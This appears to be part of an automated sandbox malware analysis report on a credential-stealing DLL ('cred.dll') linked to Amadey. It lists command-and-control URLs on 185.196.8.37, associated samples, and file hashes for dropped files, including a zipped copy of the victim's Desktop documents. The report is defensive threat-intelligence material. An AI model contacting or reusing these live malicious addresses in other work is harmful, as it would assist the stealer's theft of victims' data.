    http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.1506648426.000002A263A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1622167122.000002A2721D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1566797519.0000018290073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.00000182818D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019032286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1716912917.0000019040A23000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000014.00000002.1570212406.0000019031ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019031CC0000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000014.00000002.1570212406.0000019030BD8000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.1506648426.000002A262388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.0000018280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019030BD8000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000014.00000002.1570212406.0000019030BD8000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.microsoft.copowershell.exe, 0000000C.00000002.1607601534.00000182F7A10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1608704623.00000182F7A48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1737664936.0000019048E11000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000014.00000002.1716912917.0000019040A23000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://185.196.8.37/-A2D8-08002B30309Drundll32.exe, 00000005.00000002.1661438343.000000000321D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000014.00000002.1716912917.0000019040A23000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 0000000B.00000002.1506648426.000002A263731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.0000018281625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019031FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.microsoft.powershell.exe, 0000000C.00000002.1606498294.00000182F79EA000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.196.8.37/=1rundll32.exe, 00000005.00000002.1661438343.000000000321D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.196.8.37/Gd85kkjf/index.php?wal=1Erundll32.exe, 00000005.00000002.1661438343.0000000003204000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000014.00000002.1570212406.0000019030BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://185.196.8.37/Gd85kkjf/index.php?wal=1/rundll32.exe, 00000005.00000002.1661438343.0000000003204000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://crl.mpowershell.exe, 00000014.00000002.1737600529.0000019048DF9000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.196.8.37/Gd85kkjf/index.php?wal=13rundll32.exe, 00000005.00000002.1661438343.0000000003204000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.1506648426.000002A262388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.0000018280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019030BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/powershell.exe, 00000014.00000002.1716912917.0000019040A23000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.1506648426.000002A263A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1622167122.000002A2721D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1566797519.0000018290073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.00000182818D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019032286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1716912917.0000019040A23000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://185.196.8.37/Gd85kkjf/index.php?wal=1yqrundll32.exe, 00000005.00000002.1661438343.000000000321D000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://aka.ms/pscore68powershell.exe, 0000000B.00000002.1506648426.000002A262161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.0000018280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.00000190309B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://185.196.8.37/Gd85kkjf/index.php?wal=13lrundll32.exe, 00000005.00000002.1661438343.0000000003204000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.1506648426.000002A262161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.0000018280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.00000190309B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://185.196.8.37/rundll32.exe, 00000005.00000002.1661438343.000000000321D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.196.8.37/Gd85kkjf/index.php%qrundll32.exe, 00000005.00000002.1661438343.000000000315A000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.196.8.37
                                      		unknownSwitzerland
                                      		34888SIMPLECARRER2ITtrue

                                      General Information

                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1620561
                                      Start date and time:2025-02-21 01:52:34 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 36s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:26
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:cred.dll
                                      Detection:MAL
                                      Classification:mal100.phis.troj.spyw.evad.winDLL@32/22@0/1
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 88%
                                      • Number of executed functions: 13
                                      • Number of non-executed functions: 3
                                      Cookbook Comments:
                                      • Found application associated with file extension: .dll

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 52.149.20.212, 23.206.229.226, 20.12.23.50
                                      • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target powershell.exe, PID 8008 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      19:53:34API Interceptor69x Sleep call for process: powershell.exe modified
                                      19:53:35API Interceptor1x Sleep call for process: loaddll32.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.196.8.37clip64.dllGet hashmaliciousAmadeyBrowse
                                      • 185.196.8.37/Gd85kkjf/index.php
                                      cred64.dll.dllGet hashmaliciousAmadeyBrowse
                                      • 185.196.8.37/Gd85kkjf/index.php?wal=1
                                      qzpTLn4c4B.exeGet hashmaliciousAmadeyBrowse
                                      • 185.196.8.37/Gd85kkjf/index.php

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      SIMPLECARRER2ITclip64.dllGet hashmaliciousAmadeyBrowse
                                      • 185.196.8.37
                                      cred64.dll.dllGet hashmaliciousAmadeyBrowse
                                      • 185.196.8.37
                                      cpainject.txt.ps1Get hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                      • 185.208.159.170
                                      Th2M2e7ZfY.exeGet hashmaliciousQuasarBrowse
                                      • 185.208.159.150
                                      https://steamescommnunity.com/s/10429109537Get hashmaliciousUnknownBrowse
                                      • 185.208.158.242
                                      https://steamecomrmunity.com/s/10423910953Get hashmaliciousUnknownBrowse
                                      • 185.208.158.242
                                      http://account.turnkeycashsite.com/Get hashmaliciousUnknownBrowse
                                      • 185.208.159.7
                                      BUDDA.exeGet hashmaliciousUnknownBrowse
                                      • 185.196.8.253
                                      selavi.exeGet hashmaliciousUnknownBrowse
                                      • 185.196.8.253
                                      wow.exeGet hashmaliciousAmadey, GhostRat, GuLoader, LummaC Stealer, XWorm, XmrigBrowse
                                      • 185.196.8.34

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.0818136700495735
                                      Encrypted:false
                                      SSDEEP:3:Nlllulm/Z:NllU
                                      MD5:CB6303B568C5D1E33D8AB77A017C0164
                                      SHA1:6EF7B7E51377EBF9AF1A48440F50243E3FEA49DC
                                      SHA-256:9E4E6BA31CE95F4AD93AB03E57A80DCD0B4268CB90A81A6310A9ADCC8DB6B544
                                      SHA-512:8C582195E9F51AD71B6D6EB857073B2DB9DC8E1ECCB66E368A7052F3C7FD2ED2DC27470074BBDD07453AE77D0792BC704534AD04309B0B1E689B47200BAE28D4
                                      Malicious:false
                                      Preview:@...e...............................4................@..........

                                      C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                      Category:dropped
                                      Size (bytes):6143
                                      Entropy (8bit):7.80371186180881
                                      Encrypted:false
                                      SSDEEP:96:rW0S8j36k9i2BVqn8iUFdBVqn8iUFHCw3PCw3oxAijeV65jMOLPPGxQfMpK+:CU/0X6Fc6FHF+xAi7vPwQO
                                      MD5:840B2E3EC384E55DA22C12913BF8BA48
                                      SHA1:7649C84CF2EAAF02AFDDF6CBAFC783989F4F2BE9
                                      SHA-256:BFEBAE1C7389655162C7011A5206297675B57D72A8B020707B6C5E69DCDC15CA
                                      SHA-512:B719C02428C7899337D16F6358F30AD9AD0C3E872CB68A93B2C5596C20C4240FD89BB91E0A7D3364698ABDA236CF53BF83A1D05733B9DE10D9B6EE4EA072947A
                                      Malicious:true
                                      Preview:PK.........$EW..d)............_Files_\GAOBCVIQIJ.xlsx...E1.E.#...9`....!.. t..AE...h`...RXj...s~\......f.mv.v#.-U...;..yy..%....n(.d>........p......e.1....JG.65o..AK.B.y.)g.DJ..7..|......{......,JU]FX.P0n-...r.. .A.].e.J..3.l[.....N.{..v....T...8....\M.,..?...yc...[X.f.So....?8....R.C.x..q.V.....A.K...eW.9z.6W..U2.4Z-.|.G.J.n5.t.P..&..."..d>[.l..O.<..&..[.T..G...Fur..;_....g...8.'...%C....z.....SaS>.......p..<.m...!..M.'/.....k7.3.t.~...;...:.K..Zv4..s[.^x.;.e.Gg..}.C7......;..7.K.Zn...};.n......f..1$.f}.X9.G2f.`..=a.`....RT9.......t...W.Ng..:.~DT..'|..:.......x..........C.Y..y.T....,>...T\....I...S...R.q9g.q+IM.o...J..il.>.F.s....S...}D..=./.S..k....?PK.........$EW,.............._Files_\IPKGELNTQY.docx..In.1....(c.}.........T...........(.k.h....$.$...[..Z.u[RLbK1A.v..l.ae{m=3RPLR..n.....I..b...,.)........K... O..2;...;.5.+G..V.QP...3.+b....=..+..^.TM.z...4...^...V...9.f.v.,.WW... .3."....28D.E......;.4...&.j......q.z..k.d....

                                      C:\Users\user\AppData\Local\Temp\_Files_\GAOBCVIQIJ.xlsx

                                      Download File
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1026
                                      Entropy (8bit):4.701188456968639
                                      Encrypted:false
                                      SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                      MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                      SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                      SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                      SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                      Malicious:false
                                      Preview:GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

                                      C:\Users\user\AppData\Local\Temp\_Files_\IPKGELNTQY.docx

                                      Download File
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1026
                                      Entropy (8bit):4.695505889681456
                                      Encrypted:false
                                      SSDEEP:24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
                                      MD5:3E1BF32E65136B415337727A75BB2991
                                      SHA1:4754D2DD51AEC8E287F0F298F5A81349578DEB56
                                      SHA-256:448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
                                      SHA-512:16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
                                      Malicious:false
                                      Preview:IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

                                      C:\Users\user\AppData\Local\Temp\_Files_\IPKGELNTQY.xlsx

                                      Download File
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1026
                                      Entropy (8bit):4.695505889681456
                                      Encrypted:false
                                      SSDEEP:24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
                                      MD5:3E1BF32E65136B415337727A75BB2991
                                      SHA1:4754D2DD51AEC8E287F0F298F5A81349578DEB56
                                      SHA-256:448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
                                      SHA-512:16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
                                      Malicious:false
                                      Preview:IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

                                      C:\Users\user\AppData\Local\Temp\_Files_\LSBIHQFDVT.docx

                                      Download File
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1026
                                      Entropy (8bit):4.698193102830694
                                      Encrypted:false
                                      SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                      MD5:78472D7E4F5450A7EA86F47D75E55F39
                                      SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                      SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                      SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                      Malicious:false
                                      Preview:LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

                                      C:\Users\user\AppData\Local\Temp\_Files_\LSBIHQFDVT.xlsx

                                      Download File
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1026
                                      Entropy (8bit):4.698193102830694
                                      Encrypted:false
                                      SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                      MD5:78472D7E4F5450A7EA86F47D75E55F39
                                      SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                      SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                      SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                      Malicious:false
                                      Preview:LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

                                      C:\Users\user\AppData\Local\Temp\_Files_\NEBFQQYWPS.docx

                                      Download File
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1026
                                      Entropy (8bit):4.692704155467908
                                      Encrypted:false
                                      SSDEEP:24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
                                      MD5:D0B81B6D51E4EDDB3769BCE2A5F1538F
                                      SHA1:08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
                                      SHA-256:18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
                                      SHA-512:CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
                                      Malicious:false
